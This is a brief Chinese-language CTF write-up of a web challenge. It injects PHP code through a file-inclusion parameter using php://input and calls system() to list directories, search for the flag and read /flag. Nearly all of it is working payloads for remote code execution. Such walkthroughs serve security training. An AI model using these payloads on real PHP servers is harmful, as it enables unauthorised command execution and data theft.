打开题目

查看内容

“我没有shell，你怎么取flag？”
打开便是一个phpinfo()

尝试file

用file包含phpinfo是有回显的
?/file=php://input

<?php phpinfo(); ?>

所以构造payload ：
?file=php://input
<?php system(‘ls’);?>查看当前目录
结果如下：

<?php system(‘ls /‘); ?>查看上级目录

<?php system(‘cat /flag’); ?>查看flag内容

———

直接搜索、查看
?file=php://input

<?php system(‘find / -name flag’); ?> 查找名称为flag的文件

?file=php://input
<?php system(‘find / -name flag*’); ?> 查找名称包含flag的文件
<?php system(‘cat /flag’); ?> 查看flag内容